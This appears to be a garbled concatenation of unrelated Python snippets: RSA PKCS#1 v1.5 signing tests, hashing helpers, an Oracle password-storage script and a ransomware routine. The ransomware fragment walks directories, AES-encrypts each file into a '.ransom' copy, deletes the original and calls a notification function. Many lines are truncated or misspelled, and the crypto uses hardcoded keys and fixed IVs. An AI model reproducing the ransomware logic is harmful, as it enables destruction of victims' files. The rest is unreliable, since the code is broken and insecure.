0x0e7cdd121e40323ca6115d1ec6d1f9561738455f0e9e1cd858e8b566ae2da5e8ee63d8f15c3cdd88027e13406db609369c88ca99b34fa156c7ee62bc5a3923bb5a1edabd45c1a422aafcbb47e0947f35cfef87970b4b713162b21916cafb8c864a3e5b9ffc989401d4eae992312a32c5bc88abbb45f99ac885b54d6b8e61b6ec print("m=%x" % message) key = RSA.construct(rsa_components=(n, e, d), consistency_check=True) h =, byteorder='big')) signature_bytes = signature = int.from_bytes(signature_bytes, byteorder='big') print("signature=%x" % signature) if (signature != expected): print("expected =%x" % expected) else: print("match") #now do it low level according to #RSASSA-PKCS1-V1_5-SIGN (K, M) #M: message #emLen: n byte length def CRYPTO_EMSA_PKCS1_V1_5_ENCODE(M, emLen): msg_hash = digestAlgo = DerSequence([DerObjectId(msg_hash.oid).encode()]) print(digestAlgo) digestAlgo.append(DerNull().encode()) digest = DerOctetString(msg_hash.digest()) digestInfo = DerSequence([digestAlgo.encode(), digest.encode()]).encode() print("%x" % int.from_bytes(digestInfo, byteorder='big')) print("%x" % int.from_bytes(digestAlgo.encode(), byteorder='big')) print("%x" % int.from_bytes(digest.encode(), byteorder='big')) print("%x" % int.from_bytes(msg_hash.digest(), byteorder='big')) #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 2004 00 0501020403650148866009060d30 3130 # 501020403650148866009060d30 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 2004 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc1322732004000501020403650148866009060d30313000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0100 #3031 300d06096086480165030402010500 0420 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # 300d06096086480165030402010500 # 0420 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 #0001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d060960864801650304020105000420732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen < len(digestInfo) + 11: raise TypeError( "Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = b'\xFF' * (emLen - len(digestInfo) - 3) out = b'\x00\x01' + PS + b'\x00' + digestInfo print("%x" % int.from_bytes(out, byteorder='big')) return out modBits = Crypto.Util.number.size(key.n) k = ceil_div(modBits, 8) # Convert from bits to bytes print(k) em = CRYPTO_EMSA_PKCS1_V1_5_ENCODE(to_bytes(message, byteorder='big'), k) em_int = bytes_to_long(em) print("%x" % em_int) # Step 2b (RSASP1) m_int = key._decrypt(em_int) # Step 2c (I2OSP) sig_bytes = long_to_bytes(m_int, k) sig = int.from_bytes(sig_bytes, byteorder='big') #sig=pow(int.from_bytes(EM,byteorder='little'),d,n) print("sig=%x" % sig) if (sig != expected): print("expected =%x" % expected) else: print("match") #now low level hardcoded version: message_bytes = to_bytes(message, byteorder='big') sig_bytes = RSA_SIGN_PKCS1_V1_5_SHA256(message_bytes, d, n) sig = int.from_bytes(sig_bytes, byteorder='little') print("sig=%x" % sig) if (sig != expected): print("expected =%x" % expected) else: print("match") RSA_VERIFY_PKCS1_V1_5_SHA256(message_bytes, sig_bytes, e, n) print("verify pass")
def calc_chk(text, key): h = h.update(text) h.update(key) return h.hexdigest()
def compute_digital_signature(self, message): hashed_message ='utf8')) signer = return binascii.hexlify(signaer.sing(hashed_message)).decode('ascii')
def hash_mp(mp): h = if not isinstance(mp, bytes): mp = mp.encode('utf-8') h.update(mp) return h.hexdigest()[:32]
from Crypto.Hash import SHA256 import os bsize = 1024 fname = 'b.mp4' fhand = open(fname, 'rb') lastsize = os.stat(fname).st_size % bsize, 2) block_n = h = h.update(block_n), 1) while fhand.tell() > 0:, 1) block = + h.digest() h = h.update(block), 1) print h.hexdigest()
enc_outputfile = direx + ".ransom" file_size = str(os.path.getsize(filename)).zfill(16) init_vector = '' for i in range(16): init_vector += chr(7) encryptor =, AES.MODE_CBC, init_vector) with open(filename, 'rb') as file_handler: with open(enc_outputfile, 'wb') as outputfile_handler: while True: chunk_read = if len(chunk_read) == 0: break elif len(chunk_read) % 16 != 0: chunk_read += ' ' * (16 - (len(chunk_read) % 16)) outputfile_handler.write(encryptor.encrypt(chunk_read)) os.unlink(filename) #original file is deleted notification() for paths in path: for root, dirs, files in os.walk(paths): for names in files: print names + '\r' print root + '\r' encrypt_file("this_is_the_seed").digest(), str(os.path.join(root, names)))
Later versions will support the feature to set the environment variables and then run a (predefinied) script. To set environment variables in the calling script add this:""" print "eval $(./"+sys.argv[0]+" -r /tmp/sebas)" import getpass, os, sys, cPickle if (len(sys.argv)<3) or (sys.argv[1] != '-r' and sys.argv[1] != '-w'): x=help() sys.exit(1) from Crypto.Hash import SHA256 from Crypto.Cipher import AES try: syspw = os.environ['PASSWORD'] except KeyError: print 'What is de sys password?' syspw = getpass.getpass() hash = hash.update(syspw) crypt =, AES.MODE_CBC, 'Bassie is ok ole') #print len(hash.digest()) users="SYS","ORADBA","RMAN_DBA","DBSNMP" passwords={} if (sys.argv[1] == '-w'): try: for user in users: passwords[user]=os.environ[user+'_PW'] except: print "Environment variabele "+user+"_PW is not set." sys.exit(1) try: pickled=cPickle.dumps(passwords)+'Pickle' pickled+=(16-(len(pickled)%16))*' '